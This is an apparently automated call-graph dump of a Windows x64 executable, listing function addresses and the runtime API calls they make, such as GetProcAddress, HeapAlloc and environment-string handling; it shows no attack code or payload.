18120->18132 18133 7ff7f24f3cc7 18120->18133 18136 7ff7f24f3d2b 18120->18136 18125 7ff7f24f3c99 18122->18125 18126 7ff7f24f3d4d 18123->18126 18125->18120 18128 7ff7f24f3ac0 51 API calls 18125->18128 18129 7ff7f24f3d55 18126->18129 18130 7ff7f24f3dae 18126->18130 18128->18120 18235 7ff7f24f17e0 18129->18235 18132->18129 18132->18133 18137 7ff7f24f25f0 53 API calls 18133->18137 18140 7ff7f24f25f0 53 API calls 18136->18140 18137->18118 18140->18133 18146 7ff7f24f1bf0 49 API calls 18145->18146 18147 7ff7f24f3e24 18146->18147 18147->16946 18149 7ff7f24f3f70 108 API calls 18148->18149 18150 7ff7f24f108b 18149->18150 18151 7ff7f24f1093 18150->18151 18152 7ff7f24f10a8 18150->18152 18153 7ff7f24f25f0 53 API calls 18151->18153 18154 7ff7f24ff9f4 73 API calls 18152->18154 18159 7ff7f24f10a3 __vcrt_freefls 18153->18159 18155 7ff7f24f10bd 18154->18155 18156 7ff7f24f10c1 18155->18156 18157 7ff7f24f10dd 18155->18157 18158 7ff7f24f2760 53 API calls 18156->18158 18160 7ff7f24f110d 18157->18160 18161 7ff7f24f10ed 18157->18161 18167 7ff7f24f10d8 __vcrt_freefls 18158->18167 18159->18064 18164 7ff7f24f1113 18160->18164 18170 7ff7f24f1126 18160->18170 18162 7ff7f24f2760 53 API calls 18161->18162 18162->18167 18163 7ff7f24ff36c 74 API calls 18165 7ff7f24f1194 18163->18165 18166 7ff7f24f11f0 92 API calls 18164->18166 18165->18159 18173 7ff7f24f40a0 18165->18173 18166->18167 18167->18163 18169 7ff7f24ff6bc _fread_nolock 53 API calls 18169->18170 18170->18167 18170->18169 18171 7ff7f24f11cc 18170->18171 18172 7ff7f24f2760 53 API calls 18171->18172 18172->18167 18174 7ff7f24f40b0 18173->18174 18175 7ff7f24f86b0 2 API calls 18174->18175 18176 7ff7f24f40db 18175->18176 18177 7ff7f24f86b0 2 API calls 18176->18177 18186 7ff7f24f414e 18176->18186 18188 7ff7f250425d 18187->18188 18189 7ff7f250428a 18187->18189 18190 7ff7f25043f4 memcpy_s 11 API calls 18188->18190 18195 7ff7f2504214 18188->18195 18191 7ff7f25042ad 18189->18191 18193 7ff7f25042c9 18189->18193 18194 7ff7f2504267 18190->18194 18192 7ff7f25043f4 memcpy_s 11 API calls 18191->18192 18196 7ff7f25042b2 18192->18196 18197 7ff7f2504178 45 API calls 18193->18197 18198 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 18194->18198 18195->18098 18199 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 18196->18199 18201 7ff7f25042bd 18197->18201 18200 7ff7f2504272 18198->18200 18199->18201 18200->18098 18201->18098 18203 7ff7f24f3ae6 18202->18203 18204 7ff7f2503ca4 49 API calls 18203->18204 18205 7ff7f24f3b0c 18204->18205 18206 7ff7f24f3b1d 18205->18206 18207 7ff7f24f3f10 10 API calls 18205->18207 18206->18111 18208 7ff7f24f3b2f 18207->18208 18208->18111 18210 7ff7f24f7415 18209->18210 18211 7ff7f24f3f70 108 API calls 18210->18211 18212 7ff7f24f743b 18211->18212 18213 7ff7f24f7462 18212->18213 18214 7ff7f24f3f70 108 API calls 18212->18214 18215 7ff7f24fb870 _log10_special 8 API calls 18213->18215 18216 7ff7f24f7452 18214->18216 18217 7ff7f24f3c27 18215->18217 18218 7ff7f24f745d 18216->18218 18219 7ff7f24f746c 18216->18219 18217->18118 18237 7ff7f24f1805 18235->18237 18238 7ff7f24f1875 18235->18238 18237->18238 18266 7ff7f25051d8 18265->18266 18267 7ff7f25051fe 18266->18267 18270 7ff7f2505231 18266->18270 18268 7ff7f25043f4 memcpy_s 11 API calls 18267->18268 18269 7ff7f2505203 18268->18269 18271 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 18269->18271 18272 7ff7f2505244 18270->18272 18273 7ff7f2505237 18270->18273 18277 7ff7f24f3fc6 18271->18277 18284 7ff7f2509f38 18272->18284 18275 7ff7f25043f4 memcpy_s 11 API calls 18273->18275 18275->18277 18277->16975 18297 7ff7f250f5e8 EnterCriticalSection 18284->18297 18657 7ff7f2506c08 18656->18657 18660 7ff7f25066e4 18657->18660 18659 7ff7f2506c21 18659->16985 18661 7ff7f25066ff 18660->18661 18662 7ff7f250672e 18660->18662 18664 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 18661->18664 18670 7ff7f250477c EnterCriticalSection 18662->18670 18666 7ff7f250671f 18664->18666 18666->18659 18672 7ff7f24ff163 18671->18672 18673 7ff7f24ff191 18671->18673 18674 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 18672->18674 18680 7ff7f24ff183 18673->18680 18681 7ff7f250477c EnterCriticalSection 18673->18681 18674->18680 18680->16989 18683 7ff7f24f86b0 2 API calls 18682->18683 18684 7ff7f24f81b4 LoadLibraryExW 18683->18684 18685 7ff7f24f81d3 __vcrt_freefls 18684->18685 18685->17019 18687 7ff7f24f6ef3 GetProcAddress 18686->18687 18690 7ff7f24f6ec9 18686->18690 18688 7ff7f24f6f18 GetProcAddress 18687->18688 18687->18690 18688->18690 18691 7ff7f24f6f3d GetProcAddress 18688->18691 18689 7ff7f24f29e0 51 API calls 18692 7ff7f24f6ee3 18689->18692 18690->18689 18691->18690 18693 7ff7f24f6f65 GetProcAddress 18691->18693 18692->17026 18693->18690 18694 7ff7f24f6f8d GetProcAddress 18693->18694 18694->18690 18695 7ff7f24f6fb5 GetProcAddress 18694->18695 18696 7ff7f24f6fd1 18695->18696 18697 7ff7f24f6fdd GetProcAddress 18695->18697 18696->18697 18698 7ff7f24f7005 GetProcAddress 18697->18698 18699 7ff7f24f6ff9 18697->18699 18700 7ff7f24f7021 18698->18700 18701 7ff7f24f702d GetProcAddress 18698->18701 18699->18698 18700->18701 18702 7ff7f24f7055 GetProcAddress 18701->18702 18703 7ff7f24f7049 18701->18703 18703->18702 18749->17046 18750->17048 18752 7ff7f24f5b05 18751->18752 18753 7ff7f24f1bf0 49 API calls 18752->18753 18754 7ff7f24f5b41 18753->18754 18755 7ff7f24f5b6d 18754->18755 18756 7ff7f24f5b4a 18754->18756 18758 7ff7f24f3fe0 49 API calls 18755->18758 18757 7ff7f24f25f0 53 API calls 18756->18757 18781 7ff7f24f5b63 18757->18781 18759 7ff7f24f5b85 18758->18759 18760 7ff7f24f5ba3 18759->18760 18761 7ff7f24f25f0 53 API calls 18759->18761 18762 7ff7f24f3f10 10 API calls 18760->18762 18761->18760 18764 7ff7f24f5bad 18762->18764 18763 7ff7f24fb870 _log10_special 8 API calls 18765 7ff7f24f308e 18763->18765 18766 7ff7f24f5bbb 18764->18766 18767 7ff7f24f81a0 3 API calls 18764->18767 18765->17054 18782 7ff7f24f5c80 18765->18782 18768 7ff7f24f3fe0 49 API calls 18766->18768 18767->18766 18769 7ff7f24f5bd4 18768->18769 18770 7ff7f24f5bf9 18769->18770 18771 7ff7f24f5bd9 18769->18771 18773 7ff7f24f81a0 3 API calls 18770->18773 18772 7ff7f24f25f0 53 API calls 18771->18772 18772->18781 18774 7ff7f24f5c06 18773->18774 18775 7ff7f24f5c12 18774->18775 18776 7ff7f24f5c49 18774->18776 18777 7ff7f24f86b0 2 API calls 18775->18777 18836 7ff7f24f50b0 GetProcAddress 18776->18836 18779 7ff7f24f5c2a 18777->18779 18780 7ff7f24f29e0 51 API calls 18779->18780 18780->18781 18781->18763 18921 7ff7f24f4c80 18782->18921 18784 7ff7f24f5cba 18785 7ff7f24f5cd3 18784->18785 18786 7ff7f24f5cc2 18784->18786 18928 7ff7f24f4450 18785->18928 18787 7ff7f24f25f0 53 API calls 18786->18787 18795 7ff7f24f5cce 18787->18795 18790 7ff7f24f5cdf 18792 7ff7f24f25f0 53 API calls 18790->18792 18791 7ff7f24f5cf0 18793 7ff7f24f5cff 18791->18793 18794 7ff7f24f5d10 18791->18794 18792->18795 18796 7ff7f24f25f0 53 API calls 18793->18796 18932 7ff7f24f4700 18794->18932 18795->17056 18796->18795 18822 7ff7f24f5820 18821->18822 18822->18822 18823 7ff7f24f5849 18822->18823 18829 7ff7f24f5860 __vcrt_freefls 18822->18829 18824 7ff7f24f25f0 53 API calls 18823->18824 18825 7ff7f24f5855 18824->18825 18825->17058 18826 7ff7f24f596b 18826->17058 18827 7ff7f24f1440 116 API calls 18827->18829 18828 7ff7f24f25f0 53 API calls 18828->18829 18829->18826 18829->18827 18829->18828 18837 7ff7f24f50d2 18836->18837 18838 7ff7f24f50f7 GetProcAddress 18836->18838 18841 7ff7f24f29e0 51 API calls 18837->18841 18838->18837 18839 7ff7f24f511c GetProcAddress 18838->18839 18839->18837 18840 7ff7f24f5141 GetProcAddress 18839->18840 18840->18837 18842 7ff7f24f5169 GetProcAddress 18840->18842 18843 7ff7f24f50ec 18841->18843 18842->18837 18844 7ff7f24f5191 GetProcAddress 18842->18844 18843->18781 18844->18837 18845 7ff7f24f51b9 GetProcAddress 18844->18845 18922 7ff7f24f4cac 18921->18922 18923 7ff7f24f4cb4 18922->18923 18924 7ff7f24f4e54 18922->18924 18959 7ff7f2505db4 18922->18959 18923->18784 18925 7ff7f24f5017 __vcrt_freefls 18924->18925 18926 7ff7f24f4180 47 API calls 18924->18926 18925->18784 18926->18924 18929 7ff7f24f4480 18928->18929 18930 7ff7f24fb870 _log10_special 8 API calls 18929->18930 18931 7ff7f24f44ea 18930->18931 18931->18790 18931->18791 18933 7ff7f24f476f 18932->18933 18935 7ff7f24f471b 18932->18935 18934 7ff7f24f4300 2 API calls 18933->18934 18938 7ff7f24f475a 18935->18938 19002 7ff7f24f4300 18935->19002 18960 7ff7f2505de4 18959->18960 18963 7ff7f25052b0 18960->18963 18962 7ff7f2505e14 18962->18922 18964 7ff7f25052f3 18963->18964 18965 7ff7f25052e1 18963->18965 18967 7ff7f250533d 18964->18967 18970 7ff7f2505300 18964->18970 18966 7ff7f25043f4 memcpy_s 11 API calls 18965->18966 18969 7ff7f25052e6 18966->18969 18968 7ff7f2505358 18967->18968 18972 7ff7f2503ae0 45 API calls 18967->18972 18975 7ff7f250537a 18968->18975 18984 7ff7f2505d3c 18968->18984 18974 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 18969->18974 18971 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 18970->18971 18981 7ff7f25052f1 18971->18981 18972->18968 18974->18981 18976 7ff7f250541b 18975->18976 18977 7ff7f25043f4 memcpy_s 11 API calls 18975->18977 18978 7ff7f25043f4 memcpy_s 11 API calls 18976->18978 18976->18981 18979 7ff7f2505410 18977->18979 18980 7ff7f25054c6 18978->18980 18982 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 18979->18982 18983 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 18980->18983 18981->18962 18982->18976 18983->18981 18985 7ff7f2505d76 18984->18985 18986 7ff7f2505d5f 18984->18986 18989 7ff7f2505d64 18985->18989 18995 7ff7f250f2a8 18985->18995 18990 7ff7f250f278 18986->18990 18989->18968 18991 7ff7f250a460 __GetCurrentState 45 API calls 18990->18991 18992 7ff7f250f281 18991->18992 18993 7ff7f250cc94 45 API calls 18992->18993 18996 7ff7f2504178 45 API calls 18995->18996 18998 7ff7f250f2e1 18996->18998 18997 7ff7f250f2ed 18998->18997 19000 7ff7f2512150 48 API calls 18998->19000 19000->18997 19024->17062 15755 7ff7f250fbd8 15756 7ff7f250fbfc 15755->15756 15759 7ff7f250fc0c 15755->15759 15906 7ff7f25043f4 15756->15906 15758 7ff7f250feec 15761 7ff7f25043f4 memcpy_s 11 API calls 15758->15761 15759->15758 15760 7ff7f250fc2e 15759->15760 15762 7ff7f250fc4f 15760->15762 15909 7ff7f2510294 15760->15909 15763 7ff7f250fef1 15761->15763 15766 7ff7f250fcc1 15762->15766 15767 7ff7f250fc75 15762->15767 15772 7ff7f250fcb5 15762->15772 15765 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15763->15765 15780 7ff7f250fc01 15765->15780 15769 7ff7f250dea8 memcpy_s 11 API calls 15766->15769 15784 7ff7f250fc84 15766->15784 15924 7ff7f25089d8 15767->15924 15768 7ff7f250fd6e 15779 7ff7f250fd8b 15768->15779 15785 7ff7f250fddd 15768->15785 15773 7ff7f250fcd7 15769->15773 15772->15768 15772->15784 15936 7ff7f251643c 15772->15936 15776 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15773->15776 15781 7ff7f250fce5 15776->15781 15777 7ff7f250fc9d 15777->15772 15787 7ff7f2510294 45 API calls 15777->15787 15778 7ff7f250fc7f 15782 7ff7f25043f4 memcpy_s 11 API calls 15778->15782 15783 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15779->15783 15781->15772 15781->15784 15789 7ff7f250dea8 memcpy_s 11 API calls 15781->15789 15782->15784 15786 7ff7f250fd94 15783->15786 15930 7ff7f2509c58 15784->15930 15785->15784 15788 7ff7f25126ec 40 API calls 15785->15788 15794 7ff7f250fd99 15786->15794 15972 7ff7f25126ec 15786->15972 15787->15772 15790 7ff7f250fe1a 15788->15790 15791 7ff7f250fd07 15789->15791 15792 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15790->15792 15797 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15791->15797 15798 7ff7f250fe24 15792->15798 15795 7ff7f250fee0 15794->15795 15886 7ff7f250dea8 15794->15886 15800 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15795->15800 15796 7ff7f250fdc5 15799 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15796->15799 15797->15772 15798->15784 15798->15794 15799->15794 15800->15780 15803 7ff7f250fe79 15893 7ff7f25097b4 15803->15893 15804 7ff7f250fe70 15805 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15804->15805 15807 7ff7f250fe77 15805->15807 15812 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15807->15812 15809 7ff7f250ff1b 15902 7ff7f2509c10 IsProcessorFeaturePresent 15809->15902 15810 7ff7f250fe90 15981 7ff7f2516554 15810->15981 15812->15780 15817 7ff7f250feb7 15821 7ff7f25043f4 memcpy_s 11 API calls 15817->15821 15818 7ff7f250fed8 15820 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15818->15820 15820->15795 15822 7ff7f250febc 15821->15822 15824 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15822->15824 15824->15807 15891 7ff7f250deb9 memcpy_s 15886->15891 15887 7ff7f250df0a 15890 7ff7f25043f4 memcpy_s 10 API calls 15887->15890 15888 7ff7f250deee HeapAlloc 15889 7ff7f250df08 15888->15889 15888->15891 15889->15803 15889->15804 15890->15889 15891->15887 15891->15888 16000 7ff7f25128a0 15891->16000 15894 7ff7f25097cb 15893->15894 15895 7ff7f25097c1 15893->15895 15896 7ff7f25043f4 memcpy_s 11 API calls 15894->15896 15895->15894 15900 7ff7f25097e6 15895->15900 15897 7ff7f25097d2 15896->15897 16009 7ff7f2509bf0 15897->16009 15899 7ff7f25097de 15899->15809 15899->15810 15900->15899 15901 7ff7f25043f4 memcpy_s 11 API calls 15900->15901 15901->15897 15903 7ff7f2509c23 15902->15903 16071 7ff7f2509924 15903->16071 16093 7ff7f250a5d8 GetLastError 15906->16093 15908 7ff7f25043fd 15908->15780 15910 7ff7f25102c9 15909->15910 15911 7ff7f25102b1 15909->15911 15912 7ff7f250dea8 memcpy_s 11 API calls 15910->15912 15911->15762 15913 7ff7f25102ed 15912->15913 15914 7ff7f251034e 15913->15914 15918 7ff7f250dea8 memcpy_s 11 API calls 15913->15918 15919 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15913->15919 15920 7ff7f25097b4 __std_exception_copy 37 API calls 15913->15920 15921 7ff7f251035d 15913->15921 15923 7ff7f2510372 15913->15923 15916 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15914->15916 15916->15911 15918->15913 15919->15913 15920->15913 15922 7ff7f2509c10 _isindst 17 API calls 15921->15922 15922->15923 16110 7ff7f2509814 15923->16110 15925 7ff7f25089f1 15924->15925 15926 7ff7f25089e8 15924->15926 15925->15777 15925->15778 15926->15925 16176 7ff7f25084b0 15926->16176 15931 7ff7f2509c5d RtlFreeHeap 15930->15931 15932 7ff7f2509c8c 15930->15932 15931->15932 15933 7ff7f2509c78 GetLastError 15931->15933 15932->15780 15934 7ff7f2509c85 Concurrency::details::SchedulerProxy::DeleteThis 15933->15934 15935 7ff7f25043f4 memcpy_s 9 API calls 15934->15935 15935->15932 15937 7ff7f2516449 15936->15937 15938 7ff7f2515564 15936->15938 15940 7ff7f2504178 45 API calls 15937->15940 15939 7ff7f2515571 15938->15939 15944 7ff7f25155a7 15938->15944 15943 7ff7f25043f4 memcpy_s 11 API calls 15939->15943 15957 7ff7f2515518 15939->15957 15941 7ff7f251647d 15940->15941 15948 7ff7f2516493 15941->15948 15951 7ff7f25164aa 15941->15951 15969 7ff7f2516482 15941->15969 15942 7ff7f25155d1 15945 7ff7f25043f4 memcpy_s 11 API calls 15942->15945 15946 7ff7f251557b 15943->15946 15944->15942 15947 7ff7f25155f6 15944->15947 15949 7ff7f25155d6 15945->15949 15950 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 15946->15950 15958 7ff7f2504178 45 API calls 15947->15958 15968 7ff7f25155e1 15947->15968 15952 7ff7f25043f4 memcpy_s 11 API calls 15948->15952 15953 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 15949->15953 15954 7ff7f2515586 15950->15954 15955 7ff7f25164b4 15951->15955 15956 7ff7f25164c6 15951->15956 15959 7ff7f2516498 15952->15959 15953->15968 15954->15772 15960 7ff7f25043f4 memcpy_s 11 API calls 15955->15960 15961 7ff7f25164d7 15956->15961 15962 7ff7f25164ee 15956->15962 15957->15772 15958->15968 15963 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 15959->15963 15964 7ff7f25164b9 15960->15964 16469 7ff7f25155b4 15961->16469 16478 7ff7f251825c 15962->16478 15963->15969 15967 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 15964->15967 15967->15969 15968->15772 15969->15772 15971 7ff7f25043f4 memcpy_s 11 API calls 15971->15969 15973 7ff7f251270e 15972->15973 15976 7ff7f251272b 15972->15976 15974 7ff7f251271c 15973->15974 15973->15976 15977 7ff7f25043f4 memcpy_s 11 API calls 15974->15977 15975 7ff7f2512735 16518 7ff7f2516f84 15975->16518 15976->15975 16530 7ff7f2516f48 15976->16530 15980 7ff7f2512721 memcpy_s 15977->15980 15980->15796 15982 7ff7f2504178 45 API calls 15981->15982 15983 7ff7f25165ba 15982->15983 15985 7ff7f25165c8 15983->15985 16537 7ff7f250e234 15983->16537 16540 7ff7f25047bc 15985->16540 15988 7ff7f25166b4 15991 7ff7f25166c5 15988->15991 15992 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15988->15992 15989 7ff7f2504178 45 API calls 15990 7ff7f2516637 15989->15990 15994 7ff7f250e234 5 API calls 15990->15994 15996 7ff7f2516640 15990->15996 15993 7ff7f250feb3 15991->15993 15995 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15991->15995 15992->15991 15993->15817 15993->15818 15994->15996 15995->15993 15997 7ff7f25047bc 14 API calls 15996->15997 15998 7ff7f251669b 15997->15998 15998->15988 15999 7ff7f25166a3 SetEnvironmentVariableW 15998->15999 15999->15988 16003 7ff7f25128e0 16000->16003 16008 7ff7f250f5e8 EnterCriticalSection 16003->16008 16012 7ff7f2509a88 16009->16012 16011 7ff7f2509c09 16011->15899 16013 7ff7f2509ab3 16012->16013 16016 7ff7f2509b24 16013->16016 16015 7ff7f2509ada 16015->16011 16026 7ff7f250986c 16016->16026 16019 7ff7f2509b5f 16019->16015 16022 7ff7f2509c10 _isindst 17 API calls 16023 7ff7f2509bef 16022->16023 16024 7ff7f2509a88 _invalid_parameter_noinfo 37 API calls 16023->16024 16025 7ff7f2509c09 16024->16025 16025->16015 16027 7ff7f2509888 GetLastError 16026->16027 16028 7ff7f25098c3 16026->16028 16029 7ff7f2509898 16027->16029 16028->16019 16032 7ff7f25098d8 16028->16032 16035 7ff7f250a6a0 16029->16035 16033 7ff7f250990c 16032->16033 16034 7ff7f25098f4 GetLastError SetLastError 16032->16034 16033->16019 16033->16022 16034->16033 16036 7ff7f250a6da FlsSetValue 16035->16036 16037 7ff7f250a6bf FlsGetValue 16035->16037 16039 7ff7f250a6e7 16036->16039 16040 7ff7f25098b3 SetLastError 16036->16040 16038 7ff7f250a6d4 16037->16038 16037->16040 16038->16036 16041 7ff7f250dea8 memcpy_s 11 API calls 16039->16041 16040->16028 16042 7ff7f250a6f6 16041->16042 16043 7ff7f250a714 FlsSetValue 16042->16043 16044 7ff7f250a704 FlsSetValue 16042->16044 16046 7ff7f250a720 FlsSetValue 16043->16046 16047 7ff7f250a732 16043->16047 16045 7ff7f250a70d 16044->16045 16048 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16045->16048 16046->16045 16052 7ff7f250a204 16047->16052 16048->16040 16057 7ff7f250a0dc 16052->16057 16069 7ff7f250f5e8 EnterCriticalSection 16057->16069 16072 7ff7f250995e __GetCurrentState memcpy_s 16071->16072 16073 7ff7f2509986 RtlCaptureContext RtlLookupFunctionEntry 16072->16073 16074 7ff7f25099c0 RtlVirtualUnwind 16073->16074 16075 7ff7f25099f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16073->16075 16074->16075 16078 7ff7f2509a48 __GetCurrentState 16075->16078 16079 7ff7f24fb870 16078->16079 16080 7ff7f24fb879 16079->16080 16081 7ff7f24fbc00 IsProcessorFeaturePresent 16080->16081 16082 7ff7f24fb884 GetCurrentProcess TerminateProcess 16080->16082 16083 7ff7f24fbc18 16081->16083 16088 7ff7f24fbdf8 RtlCaptureContext 16083->16088 16089 7ff7f24fbe12 RtlLookupFunctionEntry 16088->16089 16090 7ff7f24fbc2b 16089->16090 16091 7ff7f24fbe28 RtlVirtualUnwind 16089->16091 16092 7ff7f24fbbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16090->16092 16091->16089 16091->16090 16094 7ff7f250a619 FlsSetValue 16093->16094 16099 7ff7f250a5fc 16093->16099 16095 7ff7f250a62b 16094->16095 16098 7ff7f250a609 16094->16098 16097 7ff7f250dea8 memcpy_s 5 API calls 16095->16097 16096 7ff7f250a685 SetLastError 16096->15908 16100 7ff7f250a63a 16097->16100 16098->16096 16099->16094 16099->16098 16101 7ff7f250a658 FlsSetValue 16100->16101 16102 7ff7f250a648 FlsSetValue 16100->16102 16104 7ff7f250a664 FlsSetValue 16101->16104 16105 7ff7f250a676 16101->16105 16103 7ff7f250a651 16102->16103 16107 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16103->16107 16104->16103 16106 7ff7f250a204 memcpy_s 5 API calls 16105->16106 16108 7ff7f250a67e 16106->16108 16107->16098 16109 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16108->16109 16109->16096 16119 7ff7f2512960 16110->16119 16145 7ff7f2512918 16119->16145 16150 7ff7f250f5e8 EnterCriticalSection 16145->16150 16177 7ff7f25084c9 16176->16177 16178 7ff7f25084c5 16176->16178 16199 7ff7f2511900 16177->16199 16178->15925 16191 7ff7f2508804 16178->16191 16183 7ff7f25084e7 16225 7ff7f2508594 16183->16225 16184 7ff7f25084db 16186 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16184->16186 16186->16178 16188 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16189 7ff7f250850e 16188->16189 16190 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16189->16190 16190->16178 16192 7ff7f250882d 16191->16192 16197 7ff7f2508846 16191->16197 16192->15925 16193 7ff7f250dea8 memcpy_s 11 API calls 16193->16197 16194 7ff7f25088d6 16196 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16194->16196 16195 7ff7f250faf8 WideCharToMultiByte 16195->16197 16196->16192 16197->16192 16197->16193 16197->16194 16197->16195 16198 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16197->16198 16198->16197 16200 7ff7f25084ce 16199->16200 16201 7ff7f251190d 16199->16201 16205 7ff7f2511c3c GetEnvironmentStringsW 16200->16205 16244 7ff7f250a534 16201->16244 16206 7ff7f2511c6c 16205->16206 16207 7ff7f25084d3 16205->16207 16208 7ff7f250faf8 WideCharToMultiByte 16206->16208 16207->16183 16207->16184 16209 7ff7f2511cbd 16208->16209 16210 7ff7f2511cc4 FreeEnvironmentStringsW 16209->16210 16211 7ff7f250c90c _fread_nolock 12 API calls 16209->16211 16210->16207 16212 7ff7f2511cd7 16211->16212 16213 7ff7f2511ce8 16212->16213 16214 7ff7f2511cdf 16212->16214 16216 7ff7f250faf8 WideCharToMultiByte 16213->16216 16215 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16214->16215 16217 7ff7f2511ce6 16215->16217 16218 7ff7f2511d0b 16216->16218 16217->16210 16219 7ff7f2511d19 16218->16219 16220 7ff7f2511d0f 16218->16220 16222 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16219->16222 16221 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16220->16221 16223 7ff7f2511d17 FreeEnvironmentStringsW 16221->16223 16222->16223 16223->16207 16226 7ff7f25085b9 16225->16226 16227 7ff7f250dea8 memcpy_s 11 API calls 16226->16227 16238 7ff7f25085ef 16227->16238 16228 7ff7f25085f7 16229 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16228->16229 16230 7ff7f25084ef 16229->16230 16230->16188 16231 7ff7f250866a 16232 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16231->16232 16232->16230 16233 7ff7f250dea8 memcpy_s 11 API calls 16233->16238 16234 7ff7f2508659 16463 7ff7f25087c0 16234->16463 16236 7ff7f25097b4 __std_exception_copy 37 API calls 16236->16238 16238->16228 16238->16231 16238->16233 16238->16234 16238->16236 16239 7ff7f250868f 16238->16239 16241 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16238->16241 16242 7ff7f2509c10 _isindst 17 API calls 16239->16242 16240 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16240->16228 16241->16238 16243 7ff7f25086a2 16242->16243 16245 7ff7f250a560 FlsSetValue 16244->16245 16246 7ff7f250a545 FlsGetValue 16244->16246 16248 7ff7f250a552 16245->16248 16249 7ff7f250a56d 16245->16249 16247 7ff7f250a55a 16246->16247 16246->16248 16247->16245 16250 7ff7f250a558 16248->16250 16251 7ff7f2509814 __GetCurrentState 45 API calls 16248->16251 16252 7ff7f250dea8 memcpy_s 11 API calls 16249->16252 16264 7ff7f25115d4 16250->16264 16253 7ff7f250a5d5 16251->16253 16254 7ff7f250a57c 16252->16254 16255 7ff7f250a59a FlsSetValue 16254->16255 16256 7ff7f250a58a FlsSetValue 16254->16256 16258 7ff7f250a5b8 16255->16258 16259 7ff7f250a5a6 FlsSetValue 16255->16259 16257 7ff7f250a593 16256->16257 16260 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16257->16260 16261 7ff7f250a204 memcpy_s 11 API calls 16258->16261 16259->16257 16260->16248 16262 7ff7f250a5c0 16261->16262 16263 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16262->16263 16263->16250 16287 7ff7f2511844 16264->16287 16266 7ff7f2511609 16302 7ff7f25112d4 16266->16302 16271 7ff7f251163f 16272 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16271->16272 16273 7ff7f2511626 16272->16273 16273->16200 16274 7ff7f251164e 16274->16274 16316 7ff7f251197c 16274->16316 16277 7ff7f251174a 16278 7ff7f25043f4 memcpy_s 11 API calls 16277->16278 16280 7ff7f251174f 16278->16280 16279 7ff7f25117a5 16282 7ff7f251180c 16279->16282 16327 7ff7f2511104 16279->16327 16283 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16280->16283 16281 7ff7f2511764 16281->16279 16284 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16281->16284 16286 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16282->16286 16283->16273 16284->16279 16286->16273 16288 7ff7f2511867 16287->16288 16289 7ff7f2511871 16288->16289 16342 7ff7f250f5e8 EnterCriticalSection 16288->16342 16291 7ff7f25118e3 16289->16291 16293 7ff7f2509814 __GetCurrentState 45 API calls 16289->16293 16291->16266 16295 7ff7f25118fb 16293->16295 16297 7ff7f2511952 16295->16297 16299 7ff7f250a534 50 API calls 16295->16299 16297->16266 16300 7ff7f251193c 16299->16300 16301 7ff7f25115d4 65 API calls 16300->16301 16301->16297 16343 7ff7f2504178 16302->16343 16305 7ff7f25112f4 GetOEMCP 16307 7ff7f251131b 16305->16307 16306 7ff7f2511306 16306->16307 16308 7ff7f251130b GetACP 16306->16308 16307->16273 16309 7ff7f250c90c 16307->16309 16308->16307 16310 7ff7f250c957 16309->16310 16314 7ff7f250c91b memcpy_s 16309->16314 16312 7ff7f25043f4 memcpy_s 11 API calls 16310->16312 16311 